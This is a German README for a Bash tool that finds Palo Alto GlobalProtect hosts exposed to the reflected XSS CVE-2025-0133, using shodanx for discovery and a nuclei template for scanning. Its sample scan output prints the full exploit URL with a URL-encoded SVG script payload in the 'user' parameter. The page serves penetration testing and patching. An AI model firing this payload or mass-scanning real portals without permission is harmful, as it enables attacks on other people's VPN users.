
Reflektierte XSS-Schwachstelle im Palo Alto GlobalProtect Gateway & Portal gefunden. Angreifer können über präparierte Anfragen bösartige Skripte einschleusen.
Ein auf Bash basierendes automatisiertes Scanner-Tool zur Erkennung der CVE-2025-0133-Reflected-XSS-Schwachstelle in Palo Alto GlobalProtect Gateway & Portal unter Verwendung von nuclei und shodanx.
Autor:
Datum: 2025-06-23
Schweregrad: Mittel
CVE-ID: CVE-2025-0133
Schwachstellentyp: Reflected Cross-Site Scripting (XSS)
Getestet gegen: Palo Alto Networks GlobalProtect Portal (PAN-OS)
Dieses Tool hilft Penetrationstestern und Sicherheitsforschern, schnell anfällige Domains oder IPs im Zusammenhang mit der Schwachstelle CVE-2025-0133 zu identifizieren.
Es nutzt nuclei-Templates und die Shodan-Abfrageintegration (shodanx), um Ziele effizient zu finden und zu scannen.
shodanx bei einzelnen Domains aus, um zugehörige Hosts zu ermittelnnuclei mit einem benutzerdefinierten CVE-2025-0133-Template, um Ziele zu scannen.txt- als auch im .json-Format gespeichert werden sollen$PATH verfügbarCVE-2025-0133-Nuclei-Templatedatei befindet sich unter:/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (Pfad bei Bedarf anpassen)pip install git+https://github.com/RevoltSecurities/ShodanX
Falls der Fehler angezeigt wird: "error: externally-managed-environment"
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
⚠️ Hinweis: Die Option
--break-system-packagesist auf einigen Systemen (insbesondere Debian/Ubuntu) erforderlich, damit pip Pakete außerhalb einer virtuellen Umgebung ohne Berechtigungsfehler installieren kann.
👉 Stellen Sie sicher, dass shodanx in Ihrem $PATH verfügbar ist.
Sie können es testen mit:
shodanx -h
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Prüfen, ob es installiert ist:
nuclei -version
Anschließend die Templates aktualisieren:
nuclei -update-templates
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h
Usage: ./cve20250133.sh <domain-or-file>
Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.
Options:
-h, --help, help Show this help message and exit.
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a single domain: domain.com — Running ShodanX first
_ _
| | | (_\ /
, | | __ __| __, _ _ \/
/ \_|/ \ / \_/ | / | / |/ | /\
\/ | |_/\__/ \_/|_/\_/|_/ | |_/ _/ \_/
- RevoltSecurities
[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt
Scan Start Time: 2025-06-24 16:36:37
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
Reflected-Cross-Site-Scripting-(XSS)-Schwachstelle in Palo Alto GlobalProtect Gateway & Portal, die es Angreifern ermöglicht, bösartige Skripte über manipulierte Anfragen einzuschleusen. Patchen Sie Ihre Systeme, indem Sie auf die neuesten Palo Alto Networks Releases aktualisieren, um dieses Problem zu entschärfen.
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details.